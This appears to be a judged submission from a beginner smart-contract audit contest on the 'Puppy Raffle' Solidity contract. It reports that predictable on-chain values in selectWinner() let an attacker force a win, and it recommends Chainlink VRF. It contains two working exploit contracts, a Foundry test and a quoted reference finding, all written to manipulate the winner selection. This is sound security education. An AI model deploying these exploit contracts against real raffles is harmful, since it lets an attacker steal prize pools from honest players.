Puppy Raffle

AI First Flight #1

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Weak Randomness in selectWinner() Enables Guaranteed Wins Through Predictability

georgibuilds

Root + Impact

Description

Winner selection uses three publicly readable, predictable values:

function selectWinner() external {

require(block.timestamp >= raffleStartTime + raffleDuration, "PuppyRaffle: Raffle not over");

require(players.length >= 4, "PuppyRaffle: Need at least 4 players");

// @audit-issue All inputs are publicly known and predictable

uint256 winnerIndex = uint256(keccak256(abi.encodePacked(

msg.sender, // @audit Attacker controls (their address)

block.timestamp, // @audit Publicly readable from blockchain

block.difficulty // @audit Publicly readable, deprecated in PoS

))) % players.length;

address winner = players[winnerIndex];

// ... rest of function

}

Risk

Likelihood:

Requires basic web3 knowledge and simple scripts)
No special timing or conditions needed

Repeatable across unlimited raffle rounds

Impact:

Complete fairness breakdown - legitimate players have 0% win chance

Attacker steals fees with guaranteed wins

Protocol becomes economically unviable for honest participant

Multi-round exploitation possible

Proof of Concept

The test demonstrates that within just 2 block attempts, the attacker found a timestamp where they would win and successfully claimed the prize pool.

// test/PredictableRngAttacker.sol

// SPDX-License-Identifier: MIT

pragma solidity ^0.7.6;

import {PuppyRaffle} from "../src/PuppyRaffle.sol";

contract PredictableRngAttacker {

PuppyRaffle puppyRaffle;

uint256 entranceFee;

constructor(PuppyRaffle _puppyRaffle) {

puppyRaffle = _puppyRaffle;

entranceFee = puppyRaffle.entranceFee();

}

function enterRaffle() external payable {

address[] memory players = new address[](1);

players[0] = address(this);

puppyRaffle.enterRaffle{value: entranceFee}(players);

}

function attack() external {

uint256 playerCount = 0;

for (uint256 i = 0; ; i++) {

try puppyRaffle.players(i) returns (address player) {

if (player != address(0)) playerCount++;

} catch { break; }

}

// Predict winner using SAME calculation

uint256 predictedWinnerIndex = uint256(keccak256(abi.encodePacked(

address(this), block.timestamp, block.difficulty

))) % playerCount;

require(puppyRaffle.players(predictedWinnerIndex) == address(this), "Won't win");

puppyRaffle.selectWinner();

}

function onERC721Received(address, address, uint256, bytes calldata)

external pure returns (bytes4) {

return this.onERC721Received.selector;

}

receive() external payable {}

}

// test/PuppyRaffleTest.t.sol - Add this test

function testPredictableRngManipulation() public {

address[] memory players = new address[](4);

players[0] = playerOne;

players[1] = playerTwo;

players[2] = playerThree;

players[3] = playerFour;

puppyRaffle.enterRaffle{value: entranceFee * 4}(players);

PredictableRngAttacker attacker = new PredictableRngAttacker(puppyRaffle);

attacker.enterRaffle{value: entranceFee}();

vm.warp(block.timestamp + duration + 1);

// Find winning timestamp

for (uint256 i = 0; i < 100; i++) {

vm.warp(block.timestamp + i);

uint256 predicted = uint256(keccak256(abi.encodePacked(

address(attacker), block.timestamp, block.difficulty

))) % 5;

if (puppyRaffle.players(predicted) == address(attacker)) {

attacker.attack();

assertEq(puppyRaffle.previousWinner(), address(attacker));

return;

}

// Run: forge test --mt testPredictableRngManipulation -vv

// Result: [PASS] Attacker wins after finding winning timestamp (typically 2-10 attempts)

Recommended Mitigation

Alternative: Commit-Reveal scheme (simpler but centralized - owner commits hash, reveals after delay).

+ // Use Chainlink VRF for verifiable randomness

+ import "@chainlink/contracts/src/v0.8/VRFConsumerBaseV2.sol";

+ contract PuppyRaffle is ERC721, Ownable, VRFConsumerBaseV2 {

+ VRFCoordinatorV2Interface COORDINATOR;

+ uint256 public s_requestId;

- function selectWinner() external {

+ function selectWinner() external {

require(block.timestamp >= raffleStartTime + raffleDuration, "Raffle not over");

require(players.length >= 4, "Need at least 4 players");

- uint256 winnerIndex = uint256(keccak256(abi.encodePacked(

- msg.sender, block.timestamp, block.difficulty

- ))) % players.length;

- address winner = players[winnerIndex];

+ // Request verifiable random number

+ s_requestId = COORDINATOR.requestRandomWords(

+ keyHash, s_subscriptionId, 3, 100000, 1

+ );

+ }

+ function fulfillRandomWords(uint256, uint256[] memory randomWords) internal override {

+ uint256 winnerIndex = randomWords[0] % players.length;

+ address winner = players[winnerIndex];

// ... rest of winner logic

}

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 23 hours ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!